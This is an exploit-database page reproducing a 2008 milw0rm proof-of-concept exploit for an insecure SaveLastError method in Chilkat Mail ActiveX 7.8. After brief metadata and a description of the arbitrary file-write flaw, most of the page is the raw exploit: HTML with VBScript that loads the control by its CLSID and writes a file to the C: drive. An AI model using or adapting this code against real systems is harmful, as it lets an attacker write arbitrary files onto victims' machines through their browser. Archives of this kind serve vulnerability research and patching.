header-logo
Suggest Exploit
vendor:
Chilkat Mail ActiveX
by:
darkl0rd
7.5
CVSS
HIGH
Insecure Method
264
CWE
Product Name: Chilkat Mail ActiveX
Affected Version From: 7.8
Affected Version To: 7.8
Patch Exists: Yes
Related CWE: N/A
CPE: a:chilkatsoft:chilkat_mail_activex:7.8
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP Professional SP2
2008

Chilkat Mail ActiveX 7.8 (ChilkatCert.dll) Insecure Method Exploit

A vulnerability exists in Chilkat Mail ActiveX 7.8 (ChilkatCert.dll) which allows an attacker to write arbitrary files to the system. This is due to the insecure use of the SaveLastError method which allows an attacker to specify a file path and write arbitrary data to it.

Mitigation:

Update to the latest version of Chilkat Mail ActiveX 7.8 (ChilkatCert.dll)
Source

Exploit-DB raw data:

<body bgcolor="#000000">

<p align="center"><b><font face="Verdana" color="#00FF00" size="2">Chilkat Mail 
ActiveX 7.8 (ChilkatCert.dll) Insecure Method Exploit</font></b></p>
<p align="center"><b><font face="Verdana" size="2" color="#00FF00">Site :
<a href="http://www.chilkatsoft.com"><font color="#00FF00">www.chilkatsoft.com</font></a></font></b></p>
<p align="center"><font color="#00FF00" face="Verdana">
===================================================</font></p>
<p align="center"><b><font face="Verdana" color="#00FF00" size="2">Tested on 
Windows XP Professional SP2 , with Internet Explorer 6</font></b></p>
<p align="center"><b><font face="Verdana" size="2" color="#00FF00">Author : 
darkl0rd</font></b></p>
<p align="center"><b><font face="Verdana" size="2" color="#00FF00">E-Mail : 
l_l_darkl0rd_l_l[at]yahoo[dot]com</font></b></p>
<p align="center"><b><font color="#FF0000" face="Verdana" size="2">SaveLastError</font></b></p>
<p align="center">
<object classid='clsid:2A9A3D40-2F32-45BF-9A89-AC9ED6C2FEDF' id='over' align="left"></object>

<input language=VBScript onclick=lose() type=button value="Exploit">

<script language='vbscript'>
 Sub lose
   mystr="c:\darkl0rd.txt"
   over.SaveLastError mystr
   MyMsg = MsgBox("Done !")
 End Sub
</script>
</span></span>

</code></p>
</pre>

# milw0rm.com [2008-01-29]

Navigation

Suggest Exploit

Services By CQR